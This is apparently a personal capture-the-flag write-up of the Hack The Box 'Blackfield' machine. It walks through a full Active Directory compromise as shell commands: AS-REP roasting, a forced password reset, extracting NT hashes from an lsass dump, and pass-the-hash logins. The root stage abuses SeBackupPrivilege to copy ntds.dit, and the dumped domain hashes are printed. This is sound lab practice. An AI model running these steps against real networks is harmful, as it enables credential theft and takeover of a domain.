Blackfield | Machine HTB Writeup

ReplRepl
3 min read

just a quick poc, without image. this my old notes i want to share. but i cant import the images. idk why just enjoy the short writeup for blackfield HTB

User

Enumeration

for port scanning i’m using naabu and built in nmap-cli

[Pasted image 20240617092722.png]

scan_port () {
        naabu --host "$1" -v -p - -nmap-cli 'nmap -sV -Pn' -o "$1-opened.port"
}

After we know the smb is open ( 445 ) we enum it using nxc ( test with smbclient first if we can view any usefull smbclient -L $target )

[Pasted image 20240617092952.png]

and we know we have permission in the profiles$, i will mount to the /mnt/Blackfield

sudo mount -t cifs //10.129.229.17/profiles$ /mnt/Blackfield

after that we have folder of like its 'username’ so i pipe and save it and name it user.txt

ls /mnt/blackfield > user.txt

Exploitation

after that we enum if this valid user or no, and for checking if the user was valid or no ( we know kerberos are open so we can perform https://www.netexec.wiki/ldap-protocol/asreproast )

[Pasted image 20240617093618.png]

and we found the hash. directly put to the hashcat

[Pasted image 20240617093713.png]

and we found it.

[Pasted image 20240617093734.png]

user : support@BLACKFIELD.LOCAL pass : #00^BlackKnight

but we not still able to use this account in winrm. so we enum more in the samba using this creds

https://www.netexec.wiki/smb-protocol/enumeration/enumerate-domain-users

and we found bunch of users. and we execute Kerberos pre-authentication brute again. for that bunch of users. but nothing usefull after it. so we uploaded bloodhound

bloodhound-python -u support -p  '#00^BlackKnight' -d blackfield.local -ns $TARGET -c all

$target is the ip and then we find shortest path to all of this user by mark own ( support )

head -10 domain_user.txt
Administrator
Guest
krbtgt
audit2020
support
BLACKFIELD764430
BLACKFIELD538365
BLACKFIELD189208
BLACKFIELD404458
BLACKFIELD706381

[Pasted image 20240617225900.png]

yep and we have privilage to force change password to audit2020

[Pasted image 20240617230206.png]

yep successfull owned audit2020 and then we have access to smb forensic shares

[Pasted image 20240617230254.png]

[Pasted image 20240617234738.png]

in the folder memory_analysis we have the dump for lsass.zip ( this can be used for memory forensic to get user creds on the windows it self )

pypykatz lsa minidump lsass.DMP

dont forget to extract it, and and we got this

Username: svc_backup
NT: 9658d1d1dcd9250115e2205d9f48400d

Username: Administrator
NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62

yep and we can login using the svc_backup, the root seems failed the password and we can execute winrm

nxc winrm 10.129.229.17  -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

evil-winrm -i 10.129.229.17 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

and go to the desktop obtain the user flag

Root

Enumeration

first we check our privilage using `whoami /all command

[Pasted image 20240618002748.png]

and we can see we have SeBackupPrivilage access, accordin to this article we can privilage this https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/

Exploitation

create shadowfiles to execute

[Pasted image 20240618004031.png]

set context persistent nowriters#
add volume c: alias replican#
create#
expose %replican% x:#

make sure u put it

[Pasted image 20240618014525.png]

then

diskshadow.exe /s diskshadow.txt

then according to this article https://exploit-notes.hdks.org/exploit/windows/privilege-escalation/windows-privesc-with-sebackupprivilege/ we do this

upload SeBackupPrivilegeUtils.dll
upload SeBackupPrivilegeCmdLets.dll

Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

Copy-FileSeBackupPrivilege x:\windows\ntds\ntds.dit c:\temp\ntds.dit -overwrite

then we download the ntds.dit

[Pasted image 20240618014910.png]

dont forget to download hiv system also by

reg save HKLM\SYSTEM hivsystem

then in evil-winrm just

download ntds.dit
download hivsystem

and we got it

➜ secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Impacket v0.12.0.dev1+20240516.104846.5bccf8dc - Copyright 2023 Fortra

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7f82cc4be7ee6ca0b417c0719479dbec:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::

[Pasted image 20240618015905.png]

and we obtain the root

0
Subscribe to my newsletter

Read articles from Repl directly inside your inbox. Subscribe to the newsletter, and don't miss out.

htb

Written by

Repl
Repl

the struggle itself towards the heights is enough to fill a man heart. one must imagine Sisyphus was happy